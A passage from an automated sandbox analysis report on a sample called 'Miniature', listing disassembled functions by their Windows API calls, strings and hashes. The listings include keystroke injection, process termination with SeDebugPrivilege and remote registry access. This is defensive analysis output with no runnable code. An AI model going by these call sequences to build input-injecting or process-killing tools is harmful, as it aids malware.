                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2819616528-0
                                                  • Opcode ID: ae89cb474dec987caa68335180cb3b1d60447404003365a47334a2579755e1d3
                                                  • Instruction ID: 4a06f3bd28447839ab74de4460344b2a1013eca76e5cd84b87bf31e44af7a942
                                                  • Opcode Fuzzy Hash: ae89cb474dec987caa68335180cb3b1d60447404003365a47334a2579755e1d3
                                                  • Instruction Fuzzy Hash: CC516A71A0020AAFEF60DF24DD45FAA77B5FB48724F204518F94A97290DB75AC80FB90
                                                  APIs
                                                    • Part of subcall function 00FEB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEB54D
                                                    • Part of subcall function 00FEB52D: GetCurrentThreadId.KERNEL32 ref: 00FEB554
                                                    • Part of subcall function 00FEB52D: AttachThreadInput.USER32(00000000,?,00FEA23B,?,00000001), ref: 00FEB55B
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FEA246
                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FEA263
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FEA266
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FEA26F
                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FEA28D
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FEA290
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FEA299
                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FEA2B0
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FEA2B3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                  • String ID:
                                                  • API String ID: 2014098862-0
                                                  • Opcode ID: 1949cee7b3e86ab5c4f87deab15b90768f06c9cbc9de448bf7348e8483e05dbf
                                                  • Instruction ID: 1907b12be1e600df7c6daf61b10417327a2896a4f361174976e8adec3a7a653f
                                                  • Opcode Fuzzy Hash: 1949cee7b3e86ab5c4f87deab15b90768f06c9cbc9de448bf7348e8483e05dbf
                                                  • Instruction Fuzzy Hash: 2311C271550218BEF6306F619C49F6A7A2DDB4C750F300415F3806B098CAF75C509BA0
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FE915A,00000B00,?,?), ref: 00FE94E2
                                                  • HeapAlloc.KERNEL32(00000000,?,00FE915A,00000B00,?,?), ref: 00FE94E9
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FE915A,00000B00,?,?), ref: 00FE94FE
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00FE915A,00000B00,?,?), ref: 00FE9506
                                                  • DuplicateHandle.KERNEL32(00000000,?,00FE915A,00000B00,?,?), ref: 00FE9509
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FE915A,00000B00,?,?), ref: 00FE9519
                                                  • GetCurrentProcess.KERNEL32(00FE915A,00000000,?,00FE915A,00000B00,?,?), ref: 00FE9521
                                                  • DuplicateHandle.KERNEL32(00000000,?,00FE915A,00000B00,?,?), ref: 00FE9524
                                                  • CreateThread.KERNEL32(00000000,00000000,00FE954A,00000000,00000000,00000000), ref: 00FE953E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: 907556295e0755dfaf4d641b40afe7146d22c12bdc443061300261f920a0e112
                                                  • Instruction ID: 21fa856856ed2d4b8320e5cae464da5d8b280fb35417a6d8d3aaac583f2ce867
                                                  • Opcode Fuzzy Hash: 907556295e0755dfaf4d641b40afe7146d22c12bdc443061300261f920a0e112
                                                  • Instruction Fuzzy Hash: C401BBB5640344BFE730AFA5DC4EF6B7BACEB89711F604411FA45DB199CA769804CB20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                  • API String ID: 0-572801152
                                                  • Opcode ID: a7cd6a4daf3619453b15925a7b5191da485bf0a12f311c05868b216262b4d9e7
                                                  • Instruction ID: 5d614f306ff58272c29e54a4f7da8d85c7902a25dbd729913f4f996560ac1e17
                                                  • Opcode Fuzzy Hash: a7cd6a4daf3619453b15925a7b5191da485bf0a12f311c05868b216262b4d9e7
                                                  • Instruction Fuzzy Hash: D5C1A171B0031ADFEF11DF98C884AAEB7F5BB48310F148469FA85AB281E7759945CB90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: 1cc136fea2a812c7fca78d600fed48c6d8fb1685e5d27ce2f71cf76c2cf1a964
                                                  • Instruction ID: 3d9f04daad66139b30d98973fb82cb1a7334d0061ddc5b9e86c3e716845b0192
                                                  • Opcode Fuzzy Hash: 1cc136fea2a812c7fca78d600fed48c6d8fb1685e5d27ce2f71cf76c2cf1a964
                                                  • Instruction Fuzzy Hash: 0991B470A00219AFEF25CFA9CC44FAEBBB8EF45714F008559F559AB282D7709945CFA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01017449
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 0101745D
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01017477
                                                  • _wcscat.LIBCMT ref: 010174D2
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 010174E9
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01017517
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 3f09112637efa365315e97f3700be7aecc44d716e9707e2de94544e26b057084
                                                  • Instruction ID: 06b4212c9ff45349d73fdda65d329bfcc99b76d741188bb2c9ea4411d912c8e5
                                                  • Opcode Fuzzy Hash: 3f09112637efa365315e97f3700be7aecc44d716e9707e2de94544e26b057084
                                                  • Instruction Fuzzy Hash: C741A471A40348AFEB219F68CC85BEE7BE8EF08350F10446AFAC5A7195D7759984CB50
                                                  APIs
                                                    • Part of subcall function 00FF4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00FF416D
                                                    • Part of subcall function 00FF4148: Process32FirstW.KERNEL32(00000000,?), ref: 00FF417B
                                                    • Part of subcall function 00FF4148: CloseHandle.KERNEL32(00000000), ref: 00FF4245
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0100F08D
                                                  • GetLastError.KERNEL32 ref: 0100F0A0
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0100F0CF
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0100F14C
                                                  • GetLastError.KERNEL32(00000000), ref: 0100F157
                                                  • CloseHandle.KERNEL32(00000000), ref: 0100F18C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: 6ef61cd7f5566aa2ffd85c72d3284828baf0adbbcc4643873b0fb8eaf01c8e58
                                                  • Instruction ID: 0a0a4decde7842b505784c43213c1c5e4c54be7643f2b4f9f65a7e1677b135b5
                                                  • Opcode Fuzzy Hash: 6ef61cd7f5566aa2ffd85c72d3284828baf0adbbcc4643873b0fb8eaf01c8e58
                                                  • Instruction Fuzzy Hash: B341E4302003019FEB32EF24CC95F6EB7A5AF85714F148049F9824F2C2CB79A805EB95
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00FF357C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: a82a71758dcf58f44d76f4a1a15c7ae3e3844117f72f517c2b78aad44ebc542f
                                                  • Instruction ID: 1bcf322db51d45e8cd9c3908dc86731e5ac63801878eb3a67999975b2a8434ca
                                                  • Opcode Fuzzy Hash: a82a71758dcf58f44d76f4a1a15c7ae3e3844117f72f517c2b78aad44ebc542f
                                                  • Instruction Fuzzy Hash: 9311EB72A4834BBEAB105A19DCC2DBA779CDF45370B28006EFB0066151E769AF4466A0
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FF4802
                                                  • LoadStringW.USER32(00000000), ref: 00FF4809
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FF481F
                                                  • LoadStringW.USER32(00000000), ref: 00FF4826
                                                  • _wprintf.LIBCMT ref: 00FF484C
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FF486A
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00FF4847
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: ee7c7ded106f178900bc2316e214a8573681fb7141a877c3ff3e6da4ab973e89
                                                  • Instruction ID: d7a3192e75b95f218b45027b25ef410ef14e55b87ff0aec166f004dade688efa
                                                  • Opcode Fuzzy Hash: ee7c7ded106f178900bc2316e214a8573681fb7141a877c3ff3e6da4ab973e89
                                                  • Instruction Fuzzy Hash: 9A0162F69403087FE7319BA09D89EF7736CEB08300F500595F799E2005EA79AE848B75
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                  • GetSystemMetrics.USER32(0000000F), ref: 0101DB42
                                                  • GetSystemMetrics.USER32(0000000F), ref: 0101DB62
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0101DD9D
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0101DDBB
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0101DDDC
                                                  • ShowWindow.USER32(00000003,00000000), ref: 0101DDFB
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0101DE20
                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 0101DE43
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                  • String ID:
                                                  • API String ID: 1211466189-0
                                                  • Opcode ID: eadd2c9f0fa3439dae265dbf24890027c58c58f3c20aaf9080169bee818463aa
                                                  • Instruction ID: 562766fa87131450d3839b4e449cb0e2fcf7fa84cd06f06c2614a7393ceaf620
                                                  • Opcode Fuzzy Hash: eadd2c9f0fa3439dae265dbf24890027c58c58f3c20aaf9080169bee818463aa
                                                  • Instruction Fuzzy Hash: 10B18B31600219EBDF14DFADC5897AE7BF1BF44701F0481A9ED889E289D779A950CB90
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                    • Part of subcall function 0101147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101044E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3479070676-0
                                                  • Opcode ID: 326f9643d725a87e8a8a8c8227e011b7ba65735bb37016baae6ce7e52feab7d7
                                                  • Instruction ID: c5495a3e391b608863c454dba4277cda0556decff77d6d2c7b6a619f402091d2
                                                  • Opcode Fuzzy Hash: 326f9643d725a87e8a8a8c8227e011b7ba65735bb37016baae6ce7e52feab7d7
                                                  • Instruction Fuzzy Hash: EAA159702042019FDB21EF64C880F6EBBE5BF88314F14891DF5D69B296DB39E985DB42
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FCC508,00000004,00000000,00000000,00000000), ref: 00F92E9F
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FCC508,00000004,00000000,00000000,00000000,000000FF), ref: 00F92EE7
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FCC508,00000004,00000000,00000000,00000000), ref: 00FCC55B
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FCC508,00000004,00000000,00000000,00000000), ref: 00FCC5C7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: 5b0bf5e8885c76693e8e4188922d5eda0254ad263756f2ec23b19461e62a5fe2
                                                  • Instruction ID: 437ecf22e63f577053c11547e7ae4ec89762f4faf382ecdee2e4f64e92e2e08f
                                                  • Opcode Fuzzy Hash: 5b0bf5e8885c76693e8e4188922d5eda0254ad263756f2ec23b19461e62a5fe2
                                                  • Instruction Fuzzy Hash: 58412935E04781BAEFB5AB29C9C8B7E7B92BB85320F68481DF48B43554C775A840F750
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FF7698
                                                    • Part of subcall function 00FB0FE6: std::exception::exception.LIBCMT ref: 00FB101C
                                                    • Part of subcall function 00FB0FE6: __CxxThrowException@8.LIBCMT ref: 00FB1031
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FF76CF
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00FF76EB
                                                  • _memmove.LIBCMT ref: 00FF7739
                                                  • _memmove.LIBCMT ref: 00FF7756
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00FF7765
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FF777A
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF7799
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  • Opcode ID: a0f3fa68a9caca0d4f71497e1b152e6a1aab9c6ae2cab2a9fab1005032971105
                                                  • Instruction ID: c559964bce83e4553475317216b3c5cc5c3c5440cc659472b2100d9225019277
                                                  • Opcode Fuzzy Hash: a0f3fa68a9caca0d4f71497e1b152e6a1aab9c6ae2cab2a9fab1005032971105
                                                  • Instruction Fuzzy Hash: 4731A332904209EFCB20EF55DC85EAFB778FF45310B2440A5F904AB24ADB359E14DB60
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 01016810
                                                  • GetDC.USER32(00000000), ref: 01016818
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01016823
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0101682F
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0101686B
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0101687C
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0101964F,?,?,000000FF,00000000,?,000000FF,?), ref: 010168B6
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010168D6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: f3ed97ea25959f6453266589a04eef9ffcf55041df3e88b8ccfb22e2b2ad257f
                                                  • Instruction ID: abbabc1ae39295b4bd548d9359bb2cdc684c642cf1fb605b3c0065b8ebb76266
                                                  • Opcode Fuzzy Hash: f3ed97ea25959f6453266589a04eef9ffcf55041df3e88b8ccfb22e2b2ad257f
                                                  • Instruction Fuzzy Hash: 25316D721012147FEB218F54CC89FEA3FA9EB49761F144155FE889A289C6BA9841CB74
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: fba0af77d38d4d3c6249bc6cc39fc147e363e81774f72fc9739fe134ce592303
                                                  • Instruction ID: f50eed7d652a476ebfd09c5edc118d9ab969587649f17b8a966a8f675916f361
                                                  • Opcode Fuzzy Hash: fba0af77d38d4d3c6249bc6cc39fc147e363e81774f72fc9739fe134ce592303
                                                  • Instruction Fuzzy Hash: 2B210777A012197A961475138E43FEB376EBE24754B080024FD069B302E718DE13AAE1
                                                  APIs
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                    • Part of subcall function 00FA436A: _wcscpy.LIBCMT ref: 00FA438D
                                                  • _wcstok.LIBCMT ref: 00FFF2D7
                                                  • _wcscpy.LIBCMT ref: 00FFF366
                                                  • _memset.LIBCMT ref: 00FFF399
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
